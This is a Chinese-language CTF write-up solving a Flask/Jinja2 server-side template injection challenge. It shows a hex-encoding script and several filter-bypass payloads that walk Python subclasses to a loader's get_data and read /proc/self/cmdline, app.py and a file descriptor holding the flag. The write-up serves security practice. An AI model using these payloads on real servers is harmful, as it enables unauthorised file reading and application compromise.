buuctf [pasecactf_2019]flask_ssti

  • 题目已经告诉是SSTI模板注入了
  • 测试一下
    buuctf [pasecactf_2019]flask_ssti_第1张图片
  • 做题时用""发现了过滤 fuzz一下
  • 过滤了很多东西
  • 想到去年打校赛自己未解出来的一题 结合题目提示 是个16进制转换
  • 附上自己写的python脚本
code = "/proc/self/fd/1"
ssti = ""
length = len(code)
for i in range(length):
    ssti += "\\x" + hex(ord(code[i]))[2:]
print(ssti)
  • 将下面内容转化为16进制
  • __class__:\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f
  • __base__:\x5f\x5f\x62\x61\x73\x65\x5f\x5f
  • __subclasses__:\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f
  • 构造payload:
{{[]["\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f"]["\x5f\x5f\x62\x61\x73\x65\x5f\x5f"]["\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f"]()}}

buuctf [pasecactf_2019]flask_ssti_第2张图片

  • 接下来就是选可用的对象和调用函数了
  • 我原本想用catch_warnings但是到最后的部分想起来.被过滤了不知道怎么调用了
  • 看了一下wp
  • 调用了这个类
  • payload:
{{[]["\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f"]["\x5f\x5f\x62\x61\x73\x65\x5f\x5f"]["\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f"]()[91]["\x67\x65\x74\x5f\x64\x61\x74\x61"](0,"/proc/self/cmdline")}}

buuctf [pasecactf_2019]flask_ssti_第3张图片

  • 发现现在运行的程序时app.py
  • payload:
{{[]["\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f"]["\x5f\x5f\x62\x61\x73\x65\x5f\x5f"]["\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f"]()[91]["\x67\x65\x74\x5f\x64\x61\x74\x61"](0,"app\x2epy")}}
  • 获得程序源码 可以推出flag所在位置
{{[]["\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f"]["\x5f\x5f\x62\x61\x73\x65\x5f\x5f"]["\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f"]()[91]["\x67\x65\x74\x5f\x64\x61\x74\x61"](0,"/proc/self/fd/3")}}
  • 得到flag!!!

你可能感兴趣的:(BUUCTF,安全)